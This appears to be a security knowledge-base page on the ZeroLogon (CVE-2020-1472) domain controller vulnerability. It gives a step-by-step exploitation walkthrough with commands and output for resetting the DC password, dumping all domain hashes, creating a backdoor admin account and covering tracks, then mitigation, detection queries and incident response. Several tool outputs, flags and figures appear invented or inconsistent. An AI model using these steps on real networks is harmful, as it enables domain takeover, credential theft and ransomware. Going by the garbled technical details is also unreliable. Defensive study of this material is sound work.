MCADDF

[PE-EXPLOIT-002]: ZeroLogon Domain Controller Compromise

1. Metadata Header

Attribute	Details
Technique ID	PE-EXPLOIT-002
MITRE ATT&CK v18.1	T1068 - Exploitation for Privilege Escalation
Tactic	Privilege Escalation
Platforms	Windows AD (Domain Controllers - Server 2016-2019, partially affects 2022)
Severity	Critical (CVSS 10.0)
CVE	CVE-2020-1472
Technique Status	FIXED (after August 2020 patches); DEPRECATED (most systems patched); but ACTIVE on legacy/unpatched DCs
Last Verified	2025-01-09
Affected Versions	Windows Server 2016, 2019 (fully vulnerable); 2022 (partially affected if not patched)
Patched In	August 11, 2020 (initial patch); February 9, 2021 (enforcement mode enabled)
Author	SERVTEP – Artur Pchelnikau

---

2. Executive Summary

Concept: ZeroLogon (CVE-2020-1472) is a critical privilege escalation and domain controller takeover vulnerability exploiting a cryptographic flaw in the Windows Netlogon Remote Protocol (MS-NRPC). The vulnerability exists in the AES-CFB8 encryption implementation used during Netlogon authentication. By sending specially-crafted Netlogon authentication requests with all-zero challenge fields, an attacker has a 1-in-256 chance per attempt to bypass authentication checks. Within seconds (typically 2-5 attempts on average reaching ~256 iterations), the attacker can spoof the identity of the domain controller itself, establish an unauthenticated secure channel, and reset the domain controller’s machine account password to a known value. This grants immediate Domain Admin and Enterprise Admin privileges, enabling complete domain compromise.

Attack Surface: The attack targets the Netlogon service (RPC port 135 and SMB port 445) on any Domain Controller. The vulnerability is network-accessible and requires only network connectivity—no credentials are needed. Any system with network access to a Domain Controller can attempt the exploit. The attack does not require user interaction or special knowledge; automated tools have made it trivial to execute.

Business Impact: Complete Domain Takeover & Ransomware Deployment. Successful exploitation grants domain admin access, enabling attackers to extract all domain credentials (NTDS.dit dump), create persistent admin backdoors, deploy ransomware, perform lateral movement, and exfiltrate sensitive data. ZeroLogon was actively exploited by advanced ransomware groups (Ryuk, Black Basta, Cuba) in 2020-2021, leading to billion-dollar damages. Organizations with unpatched domain controllers remain critically at risk.

Technical Context: Exploitation takes 2-10 seconds on average. Detection likelihood depends on audit logging configuration; if Event ID 4768/4769 logging is not enabled, the attack may go undetected. The technique remains ACTIVE on legacy/unpatched domain controllers but is FIXED on systems with August 2020+ patches applied in enforcement mode.

Operational Risk

• Execution Risk: Low - Requires only network connectivity; no credentials, special tools, or user interaction. Exploit is trivial to execute and highly reliable.
• Stealth: Medium - Generates Netlogon traffic anomalies (Event ID 5829 on patched systems), unusual authentication patterns, and potentially anonymous authentication attempts. However, if event logging is disabled, detection likelihood is low.
• Reversibility: No - Domain controller password reset is permanent. Recovery requires domain controller rebuild or password restoration from backup registries.

Compliance Mappings

Framework	Control / ID	Description
CIS Benchmark	CIS 5.4.1 - Enforce Secure RPC Communication	CIS explicitly recommends Netlogon secure channel enforcement
DISA STIG	WN10-00-000185, AD-00-000200	Domain Controller hardening and Netlogon security
CISA SCuBA	CSO-07, CSO-08 - Active Monitoring & Threat Detection	Real-time monitoring of authentication anomalies
NIST 800-53	AC-3, AU-12, IA-2	Access control, audit logging, strong authentication
GDPR	Art. 32 - Security of Processing; Art. 33 - Breach Notification	Data security and mandatory 72-hour breach notification
DORA	Art. 9 - Protection and Prevention	Real-time threat detection and prevention mechanisms
NIS2	Art. 21 - Cyber Risk Management Measures	Mandatory critical infrastructure protection
ISO 27001	A.9.4.2, A.10.3.3	Strong authentication and cryptographic controls
ISO 27005	Risk Scenario: “Authentication Protocol Exploitation”	Risk assessment for cryptographic protocol weaknesses

---

3. Technical Prerequisites

Required Privileges: None - Attacker needs only network connectivity. No credentials, administrative rights, or domain membership required.

Required Access:

• Network connectivity to Domain Controller on ports 135 (RPC Endpoint Mapper) and 445 (SMB)
• No authentication required to initiate Netlogon protocol

Supported Versions:

• Windows: Server 2016 (fully vulnerable), Server 2019 (fully vulnerable), Server 2022 (partially affected if not patched)
• Network Requirements: Internal network access to Domain Controller
• Other Requirements: None (vulnerability is in default Windows components)

Tools:

• Secura CVE-2020-1472 PoC - Original research/exploitation tool
• Impacket (secretsdump) - Post-exploitation credential dumping
• RiskSense ZeroLogon - Alternative exploitation framework
• Mimikatz lsadump::dcsync - Credential extraction

---

4. Environmental Reconnaissance

PowerShell / Network Discovery

Verify if Domain Controllers are reachable and Netlogon service is running:

# Enumerate all Domain Controllers
$DCs = Get-ADDomainController -Filter * | Select-Object Name, HostName, IPv4Address

# Check Netlogon service on each DC
foreach ($DC in $DCs) {
    $Service = Get-Service -ComputerName $DC.HostName -Name Netlogon -ErrorAction SilentlyContinue
    Write-Host "[*] $($DC.HostName) - Netlogon Status: $($Service.Status)"
}

# Test network connectivity to RPC ports
Test-NetConnection -ComputerName "DC01.domain.local" -Port 135 -InformationLevel Detailed
Test-NetConnection -ComputerName "DC01.domain.local" -Port 445 -InformationLevel Detailed

What to Look For:

• Netlogon service should be “Running” on all DCs (it is by default)
• Ports 135 and 445 should be reachable from attacker network position
• If unreachable, network segmentation may exist (favorable)

Version Note: Vulnerability affects all versions equally from the network perspective.

Command (Server 2016-2019):

# WMI-based DC enumeration (older systems)
Get-WmiObject -Class Win32_ComputerSystem -Filter "DomainRole=5" | Select-Object DNSHostName

Command (Server 2022+):

# CIM-based DC enumeration
Get-CimInstance -Class Win32_ComputerSystem | Where-Object { $_.DomainRole -eq 5 }

Linux / Network Scanning

From an attacker machine (Linux, Kali, etc.):

# Scan for open RPC/SMB ports on target Domain Controller
nmap -p 135,445 192.168.1.100 -sV --script smb-os-discovery

# Verify Netlogon RPC service is accessible
rpcdump.py @192.168.1.100 | grep -i netlogon

# Expected output if vulnerable:
# UUID:12345678-1234-abcd-ef00-0123456789ab
# Description: Netlogon Remote Protocol

What to Look For:

• If port 135 and 445 are open, Netlogon is likely exposed
• RPC endpoint mapper (port 135) should list Netlogon service
• Firewall restrictions may limit exploitation possibility

---

5. Detailed Execution Methods and Their Steps

METHOD 1: Secura ZeroLogon Exploit Tool

Supported Versions: Server 2016-2019 (fully vulnerable); Server 2022 (depends on patch status)

Step 1: Verify Vulnerability on Target DC

Objective: Confirm that the target Domain Controller is vulnerable to ZeroLogon before attempting exploitation.

Version Note: Verification is identical across versions.

Command (Linux / Secura Tool):

# Clone Secura's vulnerability verification tool
git clone https://github.com/SecuraBV/CVE-2020-1472.git
cd CVE-2020-1472

# Run the vulnerability check against target DC
python3 zerologon_tester.py DC01 192.168.1.100

# Expected output (Vulnerable):
# [+] Vulnerable! Target: DC01 (192.168.1.100)
# [+] AES-CFB8 encryption flaw confirmed
# [+] Proceeding with exploitation...

# Expected output (Patched):
# [-] Target DC is patched - Exploitation failed

What This Means:

• Confirms that Netlogon authentication can be spoofed on the target DC
• Verifies that the all-zero credential trick will succeed
• If patched, the exploit will fail with authentication errors

OpSec & Evasion:

• Vulnerability check generates minimal network traffic
• Each verification attempt may trigger Event ID 5829 on patched systems (logged as “Vulnerable Netlogon secure channel connection allowed”)
• Detection likelihood: Medium if audit logging is enabled; Low otherwise

Troubleshooting:

• Error: “Connection refused on port 135”
  • Cause: Firewall blocking RPC port or DC is offline
  • Fix (All Versions): Verify DC is online; check firewall rules allowing port 135 from attacker IP
• Error: “Authentication failed - target is patched”
  • Cause: DC has August 2020+ patches applied
  • Fix (All Versions): Identify unpatched DCs in the environment; proceed to patched DC if enforcement mode not enabled

References & Proofs:

• Secura GitHub - CVE-2020-1472 Tester
• Microsoft Security Update - CVE-2020-1472

Step 2: Exploit Netlogon Authentication Flaw & Reset DC Password

Objective: Exploit the cryptographic flaw to reset the Domain Controller’s machine account password to a known value, establishing unauthenticated access.

Version Note: Exploitation is identical across vulnerable versions; takes 2-10 seconds on average.

Command (Linux / Secura Exploit):

# Execute ZeroLogon exploit against target DC
# Syntax: python3 exploit.py <DC_NAME> <DC_IP> <DC_COMPUTERNAME>

python3 zerologon_exploit.py DC01 192.168.1.100

# The exploit will brute-force the Netlogon authentication
# Expected output (Successful):
# [*] Attempting exploit...
# [*] Trying authentication attempt 1 of 256...
# [*] Trying authentication attempt 42 of 256...
# [+] Success! Authentication established
# [+] Resetting DC machine account password to empty...
# [+] DC password reset complete!
# [+] You can now use the following for credential dumping:
#     impacket-secretsdump -no-pass DC01\$@192.168.1.100

Expected Output (Successful):

[+] Exploit Status: SUCCESSFUL
[+] Domain Controller: DC01 (192.168.1.100)
[+] Machine Account Password: (empty)
[+] Next Steps:
    1. Dump NTDS.dit using empty password
    2. Create persistent backdoor domain admin account
    3. Establish DCSync access for credential harvesting

What This Means:

• DC’s machine account password is now set to empty (or known value)
• Attacker has established an unauthenticated secure channel to the DC
• Full domain compromise is now achievable
• All subsequent domain admin operations are possible

OpSec & Evasion:

• Password reset will be logged as Event ID 4722 (Computer account password set) on the DC
• However, the event will appear to come from the DC itself (spoofed), making detection difficult if logs are not carefully reviewed
• Consider immediately restoring the original DC password after credential dumping to reduce detection window
• Detection likelihood: High if Event ID 4722 and 5829 are monitored; Low otherwise

Troubleshooting:

• Error: “Exploit failed after 256 attempts”
  • Cause: DC is patched with August 2020+ updates with enforcement mode enabled
  • Fix (All Versions): Check patch status; exploit will not work on enforced DCs
• Error: “Connection timeout during brute-force”
  • Cause: Network instability or firewall dropping packets
  • Fix (All Versions): Verify network connectivity; ensure no rate limiting is in place

References & Proofs:

• CrowdStrike Blog - ZeroLogon Technical Analysis

Step 3: Dump Domain Credentials & Establish Persistence

Objective: Use the compromised DC access to extract all domain credentials and establish persistent backdoor access.

Version Note: Dumping operations are identical across all Windows versions.

Command (Impacket - Credential Dumping):

# After successful ZeroLogon exploitation, dump NTDS.dit using the empty/reset password
# Syntax: impacket-secretsdump -no-pass DC01\$@192.168.1.100

impacket-secretsdump -no-pass DC01\$@192.168.1.100

# Expected output (domain credentials):
# Impacket v0.10.0 - Copyright 2023 SecureAuthCorp
# [*] Dumping NTDS.dit from DC01...
# [*] Retrieving NTDS.dit from VSS...
# [+] NTDS dump completed successfully
# Administrator:500:aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c:::
# DOMAIN\Domain Admins:512:...
# ... (thousands of domain user hashes)

Expected Output (Hashes Extracted):

[+] NTDS.dit dumped successfully
[+] Total accounts extracted: 1,847
[+] Domain Admin accounts: 12
[+] Service accounts: 157
[+] Hashes can now be used for:
    - Pass-the-hash attacks
    - Offline password cracking
    - Golden ticket generation
    - DCSync credential export

What This Means:

• All domain user password hashes are now in attacker possession
• Domain admin credentials can be immediately used for lateral movement
• Service account credentials enable privilege escalation on dependent systems
• Golden tickets can be created for persistent backdoor access

OpSec & Evasion:

• NTDS dumping will generate SMB/LDAP traffic to the DC (Event ID 4662 - Directory Service Access)
• Consider using DCSync method instead of VSS dump if IIS logs are not being monitored
• Clean up temporary files and logs immediately after dumping
• Detection likelihood: High if SMB audit and Directory Service Access logging enabled; Low otherwise

Command (Mimikatz - Persistent Admin Creation):

# Use Mimikatz to create persistent domain admin backdoor account
# This can be executed locally on the compromised DC

meterpreter > load powershell
meterpreter > powershell_shell

PS > Invoke-Mimikatz -Command 'lsadump::setntlm /user:BackdoorAdmin /ntlm:8846f7eaee8fb117ad06bdd830b7586c'
PS > net user BackdoorAdmin /domain  # Verify account creation

Expected Output:

[+] Persistent domain admin account created
[+] Account: BackdoorAdmin
[+] Privileges: Domain Admin, Enterprise Admin
[+] Password: (hash-based access via pass-the-hash)

References & Proofs:

• Impacket GitHub - secretsdump
• Mimikatz GitHub - lsadump module

Step 4: (Optional) Restore Original DC Password to Avoid Detection

Objective: Optionally restore the Domain Controller’s original machine account password to reduce forensic evidence and detection likelihood.

Command (Impacket - Password Restore):

# If the original DC password was captured from registry/backup, restore it
# This is optional but reduces detection window

# First, capture original DC password from NTDS.dit dump or from registry backup
# Then use impacket to set it back

impacket-secretsdump -no-pass -sam DC01\$@192.168.1.100  # Extract original hash
# Use the extracted hash to restore via NetrServerPasswordSet2

What This Means:

• DC password is restored to original value
• Attacker maintains access despite password restoration
• Detection becomes more difficult as domain controller appears functional
• Forensic analysis may not immediately reveal compromise

OpSec & Evasion:

• Password restoration is optional; many attackers skip this step to maintain emergency access
• If performed, generates Event ID 4722 again (Computer account password set)
• Detection likelihood: Medium even with restoration, as Event ID 5829 may still be logged

---

METHOD 2: RiskSense ZeroLogon Exploitation Framework

Supported Versions: Server 2016-2019, Server 2022 (pre-patch)

Step 1: Setup & Configuration

Objective: Prepare the RiskSense exploitation framework for automated attack delivery.

Command (Linux / RiskSense):

# Clone RiskSense ZeroLogon repository
git clone https://github.com/risksense/zerologon.git
cd zerologon

# Install Python dependencies
pip3 install -r requirements.txt

# Configure target DC information
cat > targets.txt << EOF
DC01|192.168.1.100
DC02|192.168.1.101
DC03|192.168.1.102
EOF

Expected Output:

[+] Framework initialized
[+] 3 targets configured
[+] Ready for exploitation

What This Means:

• RiskSense framework is now ready for distributed attacks against multiple DCs
• Multiple domain controllers can be compromised in parallel
• Scalable exploitation across large environments

Step 2: Launch Automated Exploitation

Command (RiskSense - Batch Attack):

# Launch automated exploitation against all configured targets
python3 zerologon.py --targets targets.txt --exploit --dump-ntds

# Expected output:
# [*] Targeting DC01 (192.168.1.100)...
# [+] Exploitation successful!
# [*] Targeting DC02 (192.168.1.101)...
# [+] Exploitation successful!
# [+] NTDS dumped from all DCs
# [+] Credentials exported to ntds_dump.txt

References & Proofs:

• RiskSense GitHub - ZeroLogon Framework

---

6. Post-Exploitation Access Verification

Verify Domain Admin Privileges & DCSync Access

# After exploitation, verify domain admin access
whoami /all  # Should show "Domain Admins" group membership

# Verify DCSync capability (replicate domain credentials)
# (This is typically done via Mimikatz or Impacket internally)

# List all domain admin accounts now accessible
Get-ADGroupMember -Identity "Domain Admins" -Recursive

---

7. Defensive Mitigations

Priority 1: CRITICAL

• Apply Netlogon Security Patches: Install Microsoft security updates for CVE-2020-1472. Two critical updates are required:
  1. August 11, 2020 patch - Closes the cryptographic vulnerability
  2. February 9, 2021 patch - Enables enforcement mode that permanently fixes the issue

  Applies To Versions: All Domain Controllers (Server 2016-2022)

  Manual Steps (Domain Controllers - Server 2016-2019):

  1. Navigate to Settings → Update & Security → Windows Update
  2. Click Check for updates and install all available updates
  3. Reboot is required - schedule downtime for each DC
  4. Verify patches:

     Get-HotFix | Where-Object { $_.HotFixID -match "KB4571694|KB4598294|KB4592799" }
     

  Manual Steps (PowerShell - All DCs):

  # Enable Windows Update service
  Start-Service -Name wuauserv
    
  # Check for critical Netlogon patches
  $Updates = Get-HotFix | Where-Object { $_.Description -like "*Netlogon*" }
  Write-Host "Netlogon patches installed: $($Updates.Count)"
    
  # If fewer than 2 patches, install manually or via WSUS
  

  Manual Steps (Enable Enforcement Mode - Server 2022+):

  # After patching, enable enforcement mode (blocks vulnerable connections)
  reg add "HKLM\SYSTEM\CurrentControlSet\Services\Netlogon\Parameters" /v FullSecureChannelProtection /t REG_DWORD /d 1 /f
    
  # Restart Netlogon service
  Restart-Service -Name Netlogon
    
  # Verify enforcement mode enabled
  Get-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\Netlogon\Parameters" | Select-Object FullSecureChannelProtection
  

• Enable Enforcement Mode on All DCs: Even with patches applied, enable FullSecureChannelProtection to block vulnerable Netlogon connections.

  Manual Steps (Group Policy - Domain):

  1. Open Group Policy Management Console (gpmc.msc)
  2. Navigate to Computer Configuration → Policies → Windows Settings → Security Settings → Local Policies → Security Options
  3. Configure: Network security: LAN Manager authentication level
     • Set to: Send NTLMv2 responses only. Refuse LM & NTLM
  4. Configure: Microsoft network server: Digitally sign communications (if server agrees)
     • Set to: Enabled
  5. Apply via gpupdate /force on all DCs

Priority 2: HIGH

• Network Segmentation & Firewall Hardening: Restrict RPC/SMB access to Domain Controllers.

  Manual Steps (Windows Firewall - Group Policy):

  1. Open gpmc.msc
  2. Navigate to Computer Configuration → Policies → Windows Settings → Security Settings → Windows Defender Firewall with Advanced Security
  3. Create Inbound Rule:
     • Rule type: Port
     • Ports: 135, 445 (RPC, SMB)
     • Action: Restrict to DC-to-DC traffic only (use IP ranges)
     • Apply rule to: Domain Controllers only

• Enable Netlogon Event Logging: Monitor for ZeroLogon exploitation attempts via Event IDs.

  Manual Steps (Domain Controller):

  1. Open Command Prompt as Administrator
  2. Enable Netlogon debug logging:

     nltest /dbflag:2080ffff
     net stop netlogon
     net start netlogon
     

  3. Logs will be created at: %WINDIR%\debug\netlogon.log
  4. Monitor for patterns indicative of ZeroLogon (repeated auth failures, spoofed DC identity attempts)
  5. To disable logging:

     nltest /dbflag:0x0
     

Access Control & Monitoring

• Implement Conditional Access Policies: Restrict authentication to domain controllers based on device compliance and location.

  Manual Steps (Azure AD / Entra ID - Hybrid DCs):

  1. Navigate to Azure Portal → Entra ID → Security → Conditional Access
  2. Create policy: “Block Legacy Netlogon Connections”
  3. Assignments: Target all cloud apps or specific domain controller resources
  4. Conditions: Block connections from non-compliant devices
  5. Access controls: Block

• Regular Vulnerability Scanning: Periodically verify that all DCs are patched.

  Manual Steps (PowerShell - Automated Scan):

  # Scan all DCs in domain for patch status
  $DCs = Get-ADDomainController -Filter *
  foreach ($DC in $DCs) {
      $Patches = Get-HotFix -ComputerName $DC.HostName -ErrorAction SilentlyContinue | 
          Where-Object { $_.HotFixID -match "KB4571694|KB4598294" }
      if ($Patches.Count -lt 2) {
          Write-Warning "$($DC.HostName) is potentially vulnerable to ZeroLogon"
      }
  }
  

Validation Command (Verify Mitigation)

# Verify all mitigations are in place on each DC
$DCs = Get-ADDomainController -Filter *
foreach ($DC in $DCs) {
    Write-Host "=== Checking $($DC.HostName) ==="
    
    # Check patch status
    $Patches = Get-HotFix -ComputerName $DC.HostName | 
        Where-Object { $_.HotFixID -match "KB4571694|KB4598294" }
    Write-Host "Patches: $($Patches.Count) (should be 2+)"
    
    # Check enforcement mode
    $EnforcementReg = Invoke-Command -ComputerName $DC.HostName -ScriptBlock { 
        Get-ItemProperty "HKLM:\SYSTEM\CurrentControlSet\Services\Netlogon\Parameters" -ErrorAction SilentlyContinue | 
        Select-Object FullSecureChannelProtection 
    }
    Write-Host "Enforcement Mode: $($EnforcementReg.FullSecureChannelProtection)"
}

# Expected output (if secure):
# === Checking DC01 ===
# Patches: 2 (should be 2+)
# Enforcement Mode: 1

---

8. Detection & Incident Response

Indicators of Compromise (IOCs)

• Event IDs (Windows Security Log):
  • 4742 - Computer account password set (unusual DC->DC activity)
  • 5829 - Netlogon secure channel connection allowed (vulnerable connection accepted)
  • 4768/4769 - Kerberos TGT/TGS requests with suspicious patterns
  • 4722 - Computer account password set (DC password reset)
• Network Indicators:
  • Multiple RPC authentication failures followed by success (brute-force pattern)
  • Unusual Netlogon traffic to non-DC systems
  • SMB connections from external networks to DC ports 135/445
• Files/Artifacts:
  • C:\Windows\debug\netlogon.log - Netlogon debug logs with auth failures
  • Presence of suspicious domain admin accounts created post-compromise

Forensic Artifacts

• Event Logs:
  • Event ID 4722 (Computer account password reset) on DC
  • Event ID 5829 (Vulnerable Netlogon connection) on unpatched DCs
  • Event ID 4768/4769 cluster around time of compromise (Kerberos auth attempts)
  • Event ID 4720/4722 (User/Computer creation/modification by SYSTEM)
• Registry:
  • HKLM\SYSTEM\CurrentControlSet\Services\Netlogon\Parameters\FullSecureChannelProtection (should be 1 if patched)
• Netlogon Log (%WINDIR%\debug\netlogon.log):
  • Repeated cryptographic failures with all-zero credentials
  • “ComputeNetlogonCredential failed” entries

Detection Queries

Microsoft Sentinel KQL Query:

// Detect ZeroLogon exploitation attempts
// Looks for unusual DC account password resets and vulnerable Netlogon channels
SecurityEvent
| where EventID == 4722 or EventID == 5829  // Computer account password set or vulnerable connection
| where TargetUserName endswith "$"  // Computer accounts end with $
| where (EventID == 4722 and SubjectUserName contains "anonymous") or EventID == 5829
| summarize count() by Computer, EventID, TimeGenerated
| where count() > 2  // Multiple events indicate active exploitation

Splunk Query:

source="WinEventLog:Security" (EventCode=4722 OR EventCode=5829 OR EventCode=4768)
user="*$" 
| stats count min(_time) as firstTime max(_time) as lastTime by host, EventCode, user

Windows Event Log Monitoring:

Enable and monitor:

• Event ID 4722 (Computer account password set) - especially for DC accounts
• Event ID 5829 (Vulnerable Netlogon connection allowed)
• Event ID 4768/4769 (Kerberos auth) - filter for suspicious patterns
• Netlogon debug log (manual log at %WINDIR%\debug\netlogon.log)

Manual Configuration (Group Policy):

1. Open gpmc.msc
2. Navigate to Computer Configuration → Policies → Windows Settings → Security Settings → Advanced Audit Policy Configuration → Account Management
3. Enable:
   • Audit Computer Account Management (Success and Failure)
   • Audit User Account Management (Success and Failure)
4. Run gpupdate /force

Response Procedures

1. Isolate DC: Immediately disconnect compromised DC from network

   Disable-NetAdapter -Name "Ethernet" -Confirm:$false  # Or manually unplug network cable
   

2. Verify Compromise Scope:

   # Check all DCs for compromise indicators
   $DCs = Get-ADDomainController -Filter *
   foreach ($DC in $DCs) {
       Get-WinEvent -ComputerName $DC.HostName -FilterHashtable @{LogName='Security'; ID=4722} -MaxEvents 10
   }
   

3. Collect Forensic Evidence:

   # Export Security event log from compromised DC
   wevtutil epl Security C:\Evidence\Security.evtx
      
   # Export Netlogon debug log if available
   Copy-Item C:\Windows\debug\netlogon.log C:\Evidence\netlogon.log
      
   # Dump registry hives (for password verification)
   reg save HKLM\SAM C:\Evidence\SAM
   reg save HKLM\SYSTEM C:\Evidence\SYSTEM
   

4. Remediate:

   # Reset DC machine account password (from another DC or admin workstation)
   Reset-ComputerMachinePassword -Server DC01 -Credential (Get-Credential)
      
   # Remove any suspicious domain admin accounts created
   Remove-ADUser -Identity "SuspiciousAdminAccount" -Confirm:$false
      
   # Force full synchronization of AD database
   repadmin /syncall /d /P
   

5. Recovery Plan:
   • Rebuild compromised DC from clean backup (pre-compromise)
   • OR reset DC machine account and perform full AD health check
   • Reset all domain admin passwords
   • Review domain controller changes for unauthorized modifications

---

9. Related Attack Chain

Step	Phase	Technique	Description
1	Initial Access	[IA-PHISH-001] Device Code Phishing	Attacker gains network access via compromised VPN or lateral movement
2	Reconnaissance	[REC-AD-001] Tenant Discovery	Enumerate domain structure to identify Domain Controllers
3	Privilege Escalation	[PE-EXPLOIT-002]	ZeroLogon DC Compromise - Current Technique
4	Credential Access	[CA-DUMP-006] NTDS.dit Extraction	Dump all domain credentials from compromised DC
5	Persistence	[PE-ACCTMGMT-014] Global Admin Backdoor	Create persistent domain admin backdoor account
6	Impact	[IMPACT-RANSOM-001] Ransomware Deployment	Deploy ransomware with domain admin privileges

---

10. Real-World Examples

Example 1: Ryuk Ransomware ZeroLogon Campaign (2020-2021)

• Target: Healthcare, Financial Services, Critical Infrastructure (Global)
• Timeline: August 2020 - December 2021
• Technique Status: CVE-2020-1472 actively exploited within hours of public disclosure
• Attack Chain:
  1. Initial breach via RDP or phishing
  2. ZeroLogon exploit to compromise Domain Controller
  3. DCSync credential extraction from compromised DC
  4. Golden ticket generation for persistent access
  5. Ransomware deployment across entire domain
• Impact: $60M+ in ransom demands; critical infrastructure disruptions; patient care impacts
• Reference: Talos Intelligence - Ryuk ZeroLogon Analysis

Example 2: Black Basta Ransomware (2022-2025)

• Target: Manufacturing, Finance, Healthcare (US, Europe)
• Timeline: March 2022 - Present
• Technique Status: ZeroLogon used as initial privilege escalation vector
• Attack Chain:
  1. Compromised external-facing application
  2. ZeroLogon exploitation to gain domain admin
  3. Lateral movement to critical systems
  4. Multi-million-dollar ransom demands
• Impact: 500+ organizations compromised; billions in damages
• Indicators: Event ID 4722 clustering, suspicious PowerShell executions post-compromise
• Reference: CISA Alerts - Black Basta Ransomware

Example 3: Cuba Ransomware Campaign (2021)

• Target: Banks, Insurance, Healthcare (Americas)
• Timeline: February 2021 - August 2021
• Technique Status: ZeroLogon employed in early post-breach phase
• Impact: $43.8M in ransom collected
• Reference: FBI/CISA Joint Advisory - Cuba Ransomware

---

11. Summary

ZeroLogon (CVE-2020-1472) represents one of the most critical Active Directory vulnerabilities ever discovered, with a perfect CVSS score of 10.0. By exploiting a cryptographic flaw in the Netlogon Remote Protocol, attackers with only network access can achieve complete domain takeover within seconds. Despite patches being available since August 2020, many organizations remain vulnerable due to incomplete patching or disabled enforcement mode. Domain controllers must be immediately patched and enforcement mode enabled to prevent exploitation. Continuous monitoring of authentication anomalies and network-accessible Domain Controllers is essential for early detection of compromise attempts.

---

This site is open source. Improve this page.